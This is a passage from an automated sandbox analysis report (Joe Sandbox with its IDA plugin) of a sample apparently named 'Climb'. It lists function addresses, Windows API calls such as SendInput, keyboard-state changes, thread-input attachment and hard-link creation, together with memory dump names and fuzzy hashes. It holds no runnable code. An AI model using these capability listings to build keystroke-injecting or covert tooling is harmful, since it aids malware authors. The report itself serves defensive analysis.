WSAGetLastError.WSOCK32 ref: 00AE2568
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00AE25E7
WSAGetLastError.WSOCK32 ref: 00AE25F1

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: c3badd3ac8d167a895340b31b5bcc4119e30388cbd842528df6e3c79418f2375
Instruction ID: 8e3737aa72220c4b70d628ca5fa507ee51e1e41e20c7b363b5d61bfff28f0e69
Opcode Fuzzy Hash: c3badd3ac8d167a895340b31b5bcc4119e30388cbd842528df6e3c79418f2375
Instruction Fuzzy Hash: 1141D375A00200AFE721EF64C986F2A77E9EB04758F54C558F91A8F2D2D772ED42CB90

Function 00AF6CB0 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(0108F2E0,?), ref: 00AF6D1A
ScreenToClient.USER32(?,?), ref: 00AF6D4D
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00AF6DBA

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: b2541c4710a20702be80fb8bf2b89f8de78eaed62864630a4905cac11c7ed633
Instruction ID: 7faf8f2b61c94edaf7f0675883e461bf91802b7d992de9d69a8ea50571fd4827
Opcode Fuzzy Hash: b2541c4710a20702be80fb8bf2b89f8de78eaed62864630a4905cac11c7ed633
Instruction Fuzzy Hash: 04513D75A00609EFCF24DFA4D980ABE7BB6FF44360F208159FA159B290DB30AD81CB50

Function 00A9B79F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b77257f5cd414d3b8c72ae10a19e539da728ee3a7f9420d4e1b17bd336d6f30b
Instruction ID: 750cbe8b5acd63dc431d71023a6efc1cc03f66f48e6037cd7974d529b57a6691
Opcode Fuzzy Hash: b77257f5cd414d3b8c72ae10a19e539da728ee3a7f9420d4e1b17bd336d6f30b
Instruction Fuzzy Hash: 7F410871B10704AFDB24AF78DE41BAABBEDEB88710F10C67AF111DB691E77199018790

Function 00AD611E Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00AD61C8
GetLastError.KERNEL32(?,00000000), ref: 00AD61EE
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00AD6213
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00AD623F

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 300f44a2ef6c459b54c4f20ebb632719fe4f65bf1627eb45dfbfc18b0cac6cb1
Instruction ID: 2c5fb48f63cbfd83a9404a16db3b32c12258f04fa70e67406fa98cfebee2ccc7
Opcode Fuzzy Hash: 300f44a2ef6c459b54c4f20ebb632719fe4f65bf1627eb45dfbfc18b0cac6cb1
Instruction Fuzzy Hash: 14416D39A00610DFCB11EF54C645A5EBBF6EF89320B188489E85A9F362CB35FD01DB91

Function 00ACB41E Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00ACB473
SetKeyboardState.USER32(00000080), ref: 00ACB48F
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00ACB4FD
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00ACB54F

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: ee5a001a8d98129479daf6657f53189a2f22f41444eded49c7d05940a6899cb1
Instruction ID: 08c6058707909d25baffcd85cb402fff532e6d974ea3b555ee14ed1bb4437578
Opcode Fuzzy Hash: ee5a001a8d98129479daf6657f53189a2f22f41444eded49c7d05940a6899cb1
Instruction Fuzzy Hash: 21318B70A2420C6EFF35CBA49806FFA7BB6AB54310F05421EE092961D2C3768D46C771

Function 00ACB563 Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,76AAC0D0,?,00008000), ref: 00ACB5B8
SetKeyboardState.USER32(00000080,?,00008000), ref: 00ACB5D4
PostMessageW.USER32(00000000,00000101,00000000), ref: 00ACB63B
SendInput.USER32(00000001,?,0000001C,76AAC0D0,?,00008000), ref: 00ACB68D

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 95fe33f2f2c9a0b8328a2b618f6b9540d1fbd4098f3011fdd53123eecf5645a1
Instruction ID: 6c3af67c351076d7d9df07b87402ace15dc1771be8d49f1539943b6687630687
Opcode Fuzzy Hash: 95fe33f2f2c9a0b8328a2b618f6b9540d1fbd4098f3011fdd53123eecf5645a1
Instruction Fuzzy Hash: 21313B309206085EFF21CB64C806FFB7BB6AF94310F05422EE081861D1D7768946DB71

Function 00AF80AE Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00AF80D4
GetWindowRect.USER32(?,?), ref: 00AF814A
PtInRect.USER32(?,?,?), ref: 00AF815A
MessageBeep.USER32(00000000), ref: 00AF81C6

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 5e7f374a98f670dba5a7099e1b367ec1abf4f5c15a91134e09934a79450337a7
Instruction ID: 5611778936285ec2202891fe43b96daca630f86dfe432fad933809351f0c6b63
Opcode Fuzzy Hash: 5e7f374a98f670dba5a7099e1b367ec1abf4f5c15a91134e09934a79450337a7
Instruction Fuzzy Hash: 72416D30A01219DFDB11CFD8C884AB9B7F5BB45314F2443A8FA549B261CB39A882CB54

Function 00AF2176 Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00AF2187

Part of subcall function 00AC4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00AC43AD
Part of subcall function 00AC4393: GetCurrentThreadId.KERNEL32 ref: 00AC43B4
Part of subcall function 00AC4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00AC2F00), ref: 00AC43BB

GetCaretPos.USER32(?), ref: 00AF219B
ClientToScreen.USER32(00000000,?), ref: 00AF21E8
GetForegroundWindow.USER32 ref: 00AF21EE

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: a1bce71b5baf35a40276a4c1449d9378e9918793ba2ff49f49297a2b1cf5a034
Instruction ID: b52793b2b90d81e7de0cbe462da40d15bb2c7451ee2c800c4a4140d7c7bd6d46
Opcode Fuzzy Hash: a1bce71b5baf35a40276a4c1449d9378e9918793ba2ff49f49297a2b1cf5a034
Instruction Fuzzy Hash: 18317075D00209AFC704EFE9C981DAEBBFCEF98304B50806AE515E7211EB359E45CBA0

Function 00ACE8AC Relevance: 6.1, APIs: 4, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 00A641EA: _wcslen.LIBCMT ref: 00A641EF

_wcslen.LIBCMT ref: 00ACE8E2
_wcslen.LIBCMT ref: 00ACE8F9
_wcslen.LIBCMT ref: 00ACE924
GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00ACE92F

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: _wcslen$ExtentPoint32Text
String ID:
API String ID: 3763101759-0
Opcode ID: 8e1150ba8ebc389152aab114e85312f4db1e8edec4aae0cdd253ccf46fa5d675
Instruction ID: 3cb2bcd2f94e15806552c3a0cb954dd95594ae4282ff0413c79b82a7128c92ae
Opcode Fuzzy Hash: 8e1150ba8ebc389152aab114e85312f4db1e8edec4aae0cdd253ccf46fa5d675
Instruction Fuzzy Hash: 8E21C771D00215AFDB11EFA4DA82FAEF7F8EF49360F154169E804BB281D6709E41C7A1

Function 00AF9A25 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A6249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00A624B0

GetCursorPos.USER32(?), ref: 00AF9A5D
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00AF9A72
GetCursorPos.USER32(?), ref: 00AF9ABA
DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00AF9AF0

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 7269d4ab6075b6f45aa498e8aec66f829d67da2604be8fb184ee756b3b89559b
Instruction ID: cedc48573d80101e4dc05fb24dacc474e3bdf32e001c3822b5e8c60d717a247f
Opcode Fuzzy Hash: 7269d4ab6075b6f45aa498e8aec66f829d67da2604be8fb184ee756b3b89559b
Instruction Fuzzy Hash: 6C217A35600018AFCF269FD4C858FFF7BBAEB49390F504166FA098B1A1D7319952DB60

Function 00ACDB6C Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00AFDC30), ref: 00ACDBA6
GetLastError.KERNEL32 ref: 00ACDBB5
CreateDirectoryW.KERNEL32(?,00000000), ref: 00ACDBC4
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00AFDC30), ref: 00ACDC21

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 2892ae2ecf4a8478727d5420f6b48c1f96892092351e4a0d6f0f34630b16df4e
Instruction ID: 7904df501a6f9c8bfd5721be271ce54d5a65021331ed04d0e7365d1998a23aaa
Opcode Fuzzy Hash: 2892ae2ecf4a8478727d5420f6b48c1f96892092351e4a0d6f0f34630b16df4e
Instruction Fuzzy Hash: 992183705082059F8700DF78C980EABBBF8EE55764F114A2DF499C72A1DB31DD46DB92

Function 00AF321E Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00AF32A6
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00AF32C0
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00AF32CE
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00AF32DC

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 55be2b39bf2d017db689aab6b786939c9521b9b09554b080106a5ff2eb6a2d11
Instruction ID: 2c436bf4a086e1202ecb563bfd15a1918713d47e5e2e7f086ac475aac9934efb
Opcode Fuzzy Hash: 55be2b39bf2d017db689aab6b786939c9521b9b09554b080106a5ff2eb6a2d11
Instruction Fuzzy Hash: D8210632205115AFDB15DBA4C845FBABBA5EF91324F248258F9268B2D2C771EE42C7D0

Function 00AC825C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00AC96E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00AC8271,?,000000FF,?,00AC90BB,00000000,?,0000001C,?,?), ref: 00AC96F3
Part of subcall function 00AC96E4: lstrcpyW.KERNEL32(00000000,?,?,00AC8271,?,000000FF,?,00AC90BB,00000000,?,0000001C,?,?,00000000), ref: 00AC9719
Part of subcall function 00AC96E4: lstrcmpiW.KERNEL32(00000000,?,00AC8271,?,000000FF,?,00AC90BB,00000000,?,0000001C,?,?), ref: 00AC974A

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00AC90BB,00000000,?,0000001C,?,?,00000000), ref: 00AC828A
lstrcpyW.KERNEL32(00000000,?,?,00AC90BB,00000000,?,0000001C,?,?,00000000), ref: 00AC82B0
lstrcmpiW.KERNEL32(00000002,cdecl,?,00AC90BB,00000000,?,0000001C,?,?,00000000), ref: 00AC82EB

Strings

cdecl, xrefs: 00AC82E2

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 72634e9c7ea671469e7e15317a3e6cfe9bd305471e5264ac62f684651e5484f8
Instruction ID: 3da9294c83723fce0fc8f3a7ed6f8cdacb3be5e31bd60c1a0ae7d770f85fb139
Opcode Fuzzy Hash: 72634e9c7ea671469e7e15317a3e6cfe9bd305471e5264ac62f684651e5484f8
Instruction Fuzzy Hash: E311263A200341ABCB15AF78D848E7A77E9FF44750B11412EF906CB2A0EF359812C790

Function 00AF60FF Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 00AF615A
_wcslen.LIBCMT ref: 00AF616C
_wcslen.LIBCMT ref: 00AF6177
SendMessageW.USER32(?,00001002,00000000,?), ref: 00AF62B5

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: 3c47562cd7fce194dcd4a4ba2fa58f549b26d4f846107e5c20039d6ee5deb9bf
Instruction ID: 3c8faa0fc2f835a414a03ecc8e2d3b0328865a11ae9e2a6902aa6e61da336d91
Opcode Fuzzy Hash: 3c47562cd7fce194dcd4a4ba2fa58f549b26d4f846107e5c20039d6ee5deb9bf
Instruction Fuzzy Hash: E611817590021CA6DB20EFE4DD84AFE7BBCEF15354B20422AFB15D6081EB70C945CB64

Function 00A92079 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61ecb6e69be2158e45709cde51f09c1ac9bc4f4c5f4ef207ea210e20809371ff
Instruction ID: 9c7cdc897a4de999ccb1978ca4edd26752b95c4c6c38afee227c98e4c1a849f8
Opcode Fuzzy Hash: 61ecb6e69be2158e45709cde51f09c1ac9bc4f4c5f4ef207ea210e20809371ff
Instruction Fuzzy Hash: 4901ADB23092167EFE2126B8BCC1F6B679DDF423B8B300725B521A51D1DE718C80C3A0

Function 00AC2374 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00AC2394
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AC23A6
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AC23BC
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AC23D7

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 90a05f81e1cd232d174fce10de32d8ffbc36b62274f7b327c6fcd15b1b7d85d8
Instruction ID: 9ca5554919705ae41d36d7b45fe67a566a7473bcf381b81840e3f4d9d6b50790
Opcode Fuzzy Hash: 90a05f81e1cd232d174fce10de32d8ffbc36b62274f7b327c6fcd15b1b7d85d8
Instruction Fuzzy Hash: FD11093A900218FFEB11DBA5CD85F9DFB78FB08750F210095EA11BB290D6716E11DB94

Function 00A61AAC Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00A6249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00A624B0

DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00A61AF4
GetClientRect.USER32(?,?), ref: 00AA31F9
GetCursorPos.USER32(?), ref: 00AA3203
ScreenToClient.USER32(?,?), ref: 00AA320E

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 33741932fdf4d15c844a9b80ca65f57fa558067890254cea8e54dfd3a7f36432
Instruction ID: 6508bf8a3349508ef82d2d2abaf96c85ebf496700fb79063aa62d8a0500d7771
Opcode Fuzzy Hash: 33741932fdf4d15c844a9b80ca65f57fa558067890254cea8e54dfd3a7f36432
Instruction Fuzzy Hash: 14112832A01119ABCF00DFE8C9469FE7BB9EB05380F100452F912E3140CB31AA92DBA1

Function 00ACEAED Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00ACEB14
MessageBoxW.USER32(?,?,?,?), ref: 00ACEB47
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00ACEB5D
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00ACEB64

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
